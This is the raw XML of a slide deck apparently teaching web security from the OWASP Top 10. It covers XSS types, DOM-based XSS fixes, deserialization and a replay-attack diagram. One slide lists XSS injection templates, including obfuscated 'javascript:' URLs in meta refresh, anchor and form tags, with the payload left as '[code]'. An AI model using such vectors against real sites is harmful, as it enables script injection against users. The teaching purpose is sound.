              </a:rPr>
              <a:t>&lt;meta http-equiv="refresh" content="0;url=javascript:</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2800">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>[code]</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2800">
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>"&gt; </a:t>
            </a:r>
            <a:endParaRPr sz="2800">
              <a:latin typeface="Courier New"/>
              <a:ea typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
              <a:sym typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="400050" indent="-400050">
              <a:spcBef>
                <a:spcPts val="400"/>
              </a:spcBef>
              <a:buFont typeface="Courier New"/>
              <a:buAutoNum type="arabicPeriod" startAt="1"/>
            </a:pPr>
            <a:r>
              <a:rPr sz="2800">
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>&lt;a href=javas&amp;#99;ript&amp;#35; </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2800">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>[code]</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2800">
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>&gt; </a:t>
            </a:r>
            <a:endParaRPr sz="2800">
              <a:latin typeface="Courier New"/>
              <a:ea typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
              <a:sym typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="400050" indent="-400050">
              <a:spcBef>
                <a:spcPts val="400"/>
              </a:spcBef>
              <a:buFont typeface="Courier New"/>
              <a:buAutoNum type="arabicPeriod" startAt="1"/>
            </a:pPr>
            <a:r>
              <a:rPr sz="2800">
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>&lt;form action=javascript:</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2800">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>[code]</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2800">
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>&gt; </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
  <p:transition xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" spd="med" advClick="1"/>
</p:sld>
</file>

<file path=ppt/slides/slide1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7" name="4 types of XSS attack"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="650239" y="390596"/>
            <a:ext cx="11704322" cy="1625601"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>4 types of XSS attack</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1708" name="image5.png" descr="image5.png"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2">
            <a:extLst/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="121919" y="2045546"/>
            <a:ext cx="12882882" cy="770805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6" name="Title"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="650239" y="390596"/>
            <a:ext cx="11704322" cy="1625601"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="667" name="Body"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="650239" y="2275840"/>
            <a:ext cx="11704322" cy="6436926"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="668" name="http://www.emeraldinsight.com/content_images/fig/2630250502001.png" descr="http://www.emeraldinsight.com/content_images/fig/2630250502001.png"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2">
            <a:extLst/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="216745" y="758613"/>
            <a:ext cx="12652481" cy="7777871"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="12700">
            <a:miter lim="400000"/>
          </a:ln>
        </p:spPr>
      </p:pic>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
  <p:transition xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" spd="med" advClick="1"/>
</p:sld>
</file>

<file path=ppt/slides/slide1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0" name="if you want to use user input to write in a &lt;div&gt; element don't use innerHtml, instead use innerText/textContent. This will solve the problem, and it is the right way to remediate DOM based XSS vulnerbilities.…"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="391159" indent="-391159" defTabSz="514095">
              <a:spcBef>
                <a:spcPts val="3600"/>
              </a:spcBef>
              <a:defRPr sz="3168"/>
            </a:pPr>
            <a:r>
              <a:t> if you want to use user input to write in a &lt;div&gt; element don't use innerHtml, instead use innerText/textContent. This will solve the problem, and it is the right way to remediate DOM based XSS vulnerbilities.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="391159" indent="-391159" defTabSz="514095">
              <a:spcBef>
                <a:spcPts val="3600"/>
              </a:spcBef>
              <a:defRPr sz="3168"/>
            </a:pPr>
          </a:p>
          <a:p>
            <a:pPr marL="391159" indent="-391159" defTabSz="514095">
              <a:spcBef>
                <a:spcPts val="3600"/>
              </a:spcBef>
              <a:defRPr sz="3168"/>
            </a:pPr>
            <a:r>
              <a:t>&lt;b&gt;Current URL:&lt;/b&gt; &lt;span id="contentholder"&gt;&lt;/span&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="391159" indent="-391159" defTabSz="514095">
              <a:spcBef>
                <a:spcPts val="3600"/>
              </a:spcBef>
              <a:defRPr sz="3168"/>
            </a:pPr>
            <a:r>
              <a:t>&lt;script&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="391159" indent="-391159" defTabSz="514095">
              <a:spcBef>
                <a:spcPts val="3600"/>
              </a:spcBef>
              <a:defRPr sz="3168"/>
            </a:pPr>
            <a:r>
              <a:t>document.getElementById("contentholder").textContent = document.baseURI;    </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="391159" indent="-391159" defTabSz="514095">
              <a:spcBef>
                <a:spcPts val="3600"/>
              </a:spcBef>
              <a:defRPr sz="3168"/>
            </a:pPr>
            <a:r>
              <a:t>&lt;/script&gt;</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
  <p:transition xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" spd="med" advClick="1"/>
</p:sld>
</file>

<file path=ppt/slides/slide1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2" name="It is always a bad idea to use a user-controlled input in dangerous sources such as  eval. 99% of the time it is an indication of bad or lazy programming practice, so simply don't do it instead of trying to sanitize the input."/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>It is always a bad idea to use a user-controlled input in dangerous sources such as  eval. 99% of the time it is an indication of bad or lazy programming practice, so simply don't do it instead of trying to sanitize the input.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
  <p:transition xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" spd="med" advClick="1"/>
</p:sld>
</file>

<file path=ppt/slides/slide1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4" name="Title"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="650239" y="390596"/>
            <a:ext cx="11704322" cy="1625601"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1715" name="Body"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="650239" y="2275840"/>
            <a:ext cx="11704322" cy="6436926"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1716" name="Aspect Security RXSS" descr="Aspect Security RXSS"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2">
            <a:extLst/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1625599" y="1950719"/>
            <a:ext cx="9695096" cy="6502401"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="12700">
            <a:miter lim="400000"/>
          </a:ln>
        </p:spPr>
      </p:pic>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
  <p:transition xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" spd="med" advClick="1"/>
</p:sld>
</file>

<file path=ppt/slides/slide1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8" name="Stored (Persistent) XSS"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="650239" y="390596"/>
            <a:ext cx="11704322" cy="1625601"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:defRPr b="1"/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr>
              <a:defRPr b="0"/>
            </a:pPr>
            <a:r>
              <a:rPr b="1"/>
              <a:t>Stored (Persistent) XSS </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1719" name="Body"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="650239" y="2275840"/>
            <a:ext cx="11704322" cy="6436926"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1720" name="SXSS" descr="SXSS"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2">
            <a:extLst/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2600959" y="3034453"/>
            <a:ext cx="7857068" cy="4998722"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="12700">
            <a:miter lim="400000"/>
          </a:ln>
        </p:spPr>
      </p:pic>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
  <p:transition xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" spd="med" advClick="1"/>
</p:sld>
</file>

<file path=ppt/slides/slide1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2" name="Title"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1723" name="XSS exploits have been reported for more than 20 years, and have impacted Twitter, Facebook, YouTube, and many, many others. It’s showing no signs of waining, however, as both Adobe and WordPress patched XSS vulnerabilities as recently as November 2017"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr marL="0" indent="0" defTabSz="457200">
              <a:lnSpc>
                <a:spcPts val="2800"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buSzTx/>
              <a:buNone/>
              <a:defRPr sz="1200">
                <a:latin typeface="Times"/>
                <a:ea typeface="Times"/>
                <a:cs typeface="Times"/>
                <a:sym typeface="Times"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>XSS exploits have been reported for more than 20 years, and have impacted Twitter, Facebook, YouTube, and many, many others. It’s showing no signs of waining, however, as both Adobe and WordPress patched XSS vulnerabilities as recently as November 2017</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
  <p:transition xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" spd="med" advClick="1"/>
</p:sld>
</file>

<file path=ppt/slides/slide1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5" name="A8 : Insecure Deserialization"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="523804" y="4231077"/>
            <a:ext cx="11704321" cy="2144888"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>A8 : Insecure Deserialization</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="17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28" name="Image" descr="Image"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2">
            <a:extLst/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2705100" y="2749550"/>
            <a:ext cx="7594600" cy="4254500"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="12700">
            <a:miter lim="400000"/>
          </a:ln>
        </p:spPr>
      </p:pic>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
  <p:transition xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" spd="med" advClick="1"/>
</p:sld>
</file>

<file path=ppt/slides/slide1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0" name="A9 : Using components with known Vulnerability"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="523804" y="4231077"/>
            <a:ext cx="11704321" cy="2144888"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>A9 : Using components with known Vulnerability</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="17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33" name="Image" descr="Image"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2">
            <a:extLst/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2705100" y="2749550"/>
            <a:ext cx="7594600" cy="4254500"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="12700">
            <a:miter lim="400000"/>
          </a:ln>
        </p:spPr>
      </p:pic>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
  <p:transition xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" spd="med" advClick="1"/>
</p:sld>
</file>

<file path=ppt/slides/slide1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5" name="A10 : Insufficient Logging and Monitoring"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="523804" y="4231077"/>
            <a:ext cx="11704321" cy="2144888"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>A10 : Insufficient Logging and Monitoring</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="17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0" name="Replay Attack"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="body" idx="4294967295"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1505937" y="2059093"/>
            <a:ext cx="9992926" cy="6676250"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="0" tIns="0" rIns="0" bIns="0" anchor="t"/>
          <a:lstStyle>
            <a:lvl1pPr marL="323850" indent="-323850" defTabSz="1300480">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1600"/>
              </a:spcBef>
              <a:buSzPct val="70000"/>
              <a:buBlip>
                <a:blip r:embed="rId2"/>
              </a:buBlip>
              <a:defRPr b="1" sz="3400">
                <a:latin typeface="Arial Narrow"/>
                <a:ea typeface="Arial Narrow"/>
                <a:cs typeface="Arial Narrow"/>
                <a:sym typeface="Arial Narrow"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>Replay Attack</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="671" name="Server01" descr="Server01"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:extLst/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="9708444" y="3772746"/>
            <a:ext cx="1151468" cy="1354668"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="12700">
            <a:miter lim="400000"/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="672" name="User_UserHalfA01" descr="User_UserHalfA01"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4">
            <a:extLst/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1772355" y="3443111"/>
            <a:ext cx="934721" cy="1472072"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="12700">
            <a:miter lim="400000"/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="673" name="Shape"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3397955" y="4147537"/>
            <a:ext cx="5996659" cy="5463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57" y="6217"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="16585" y="3056"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="16512" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="19047" y="5584"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="20803" y="9378"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="21600" y="11274"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="21383" y="11696"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="20803" y="12960"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="19047" y="16437"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="16476" y="21600"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="16693" y="15700"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="11274"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="16657" y="6217"/>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sp>
        <p:nvSpPr>
          <p:cNvPr id="674" name="User"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1903414" y="4994204"/>
            <a:ext cx="670345" cy="472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1300480">
              <a:defRPr sz="2400">
                <a:latin typeface="Arial Narrow"/>
                <a:ea typeface="Arial Narrow"/>
                <a:cs typeface="Arial Narrow"/>
                <a:sym typeface="Arial Narrow"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>User</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="675" name="www.IBuySpy.com"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9141999" y="3276035"/>
            <a:ext cx="2194047" cy="472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1300480">
              <a:defRPr sz="2400">
                <a:latin typeface="Arial Narrow"/>
                <a:ea typeface="Arial Narrow"/>
                <a:cs typeface="Arial Narrow"/>
                <a:sym typeface="Arial Narrow"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>www.IBuySpy.com</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="680" name="Group"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="3689208" y="6396284"/>
            <a:ext cx="2192304" cy="2005980"/>
            <a:chOff x="0" y="0"/>
            <a:chExt cx="2192302" cy="2005979"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="678" name="Group"/>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="0" y="0"/>
              <a:ext cx="2192303" cy="1587218"/>
              <a:chOff x="0" y="0"/>
              <a:chExt cx="2192302" cy="1587217"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:pic>
            <p:nvPicPr>
              <p:cNvPr id="676" name="ThreatC01" descr="ThreatC01"/>
              <p:cNvPicPr>
                <a:picLocks noChangeAspect="1"/>
              </p:cNvPicPr>
              <p:nvPr/>
            </p:nvPicPr>
            <p:blipFill>
              <a:blip r:embed="rId5">
                <a:extLst/>
              </a:blip>
              <a:stretch>
                <a:fillRect/>
              </a:stretch>
            </p:blipFill>
            <p:spPr>
              <a:xfrm>
                <a:off x="0" y="0"/>
                <a:ext cx="2192303" cy="1282418"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
              <a:ln w="12700" cap="flat">
                <a:noFill/>
                <a:miter lim="400000"/>
              </a:ln>
              <a:effectLst/>
            </p:spPr>
          </p:pic>
          <p:pic>
            <p:nvPicPr>
              <p:cNvPr id="677" name="User_UserHalfE01" descr="User_UserHalfE01"/>
              <p:cNvPicPr>
                <a:picLocks noChangeAspect="1"/>
              </p:cNvPicPr>
              <p:nvPr/>
            </p:nvPicPr>
            <p:blipFill>
              <a:blip r:embed="rId6">
                <a:extLst/>
              </a:blip>
              <a:stretch>
                <a:fillRect/>
              </a:stretch>
            </p:blipFill>
            <p:spPr>
              <a:xfrm>
                <a:off x="548640" y="135466"/>
                <a:ext cx="923432" cy="1451752"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
              <a:ln w="12700" cap="flat">
                <a:noFill/>
                <a:miter lim="400000"/>
              </a:ln>
              <a:effectLst/>
            </p:spPr>
          </p:pic>
        </p:grpSp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="679" name="Attacker"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="518898" y="1533031"/>
              <a:ext cx="1059679"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defTabSz="1300480">
                <a:defRPr sz="2400">
                  <a:latin typeface="Arial Narrow"/>
                  <a:ea typeface="Arial Narrow"/>
                  <a:cs typeface="Arial Narrow"/>
                  <a:sym typeface="Arial Narrow"/>
                </a:defRPr>
              </a:lvl1pPr>
            </a:lstStyle>
            <a:p>
              <a:pPr/>
              <a:r>
                <a:t>Attacker</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
